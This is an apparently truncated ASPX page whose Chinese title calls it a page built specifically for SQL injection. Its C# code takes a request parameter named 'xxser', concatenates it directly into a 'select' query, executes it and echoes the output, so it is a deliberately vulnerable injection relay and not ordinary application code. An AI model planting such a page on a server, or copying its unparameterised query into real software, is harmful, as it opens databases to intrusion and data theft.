<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "">

<html xmlns="">

<head runat="server">

<title>暗影aspx构造注射专用页面</title>

</head>

<body>

<form id="form1" runat="server">

<div>

<script language="c#" runat="server">

void page_init(object sender, EventArgs e)

{

System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();

conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();

conn.Open();

string i =  this.Page.Request.Params["xxser"];  //这里是参数?xxser=1

System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);

int x = command.ExecuteNonQuery();

Response.Write(i+"\n");

Response.Write(x);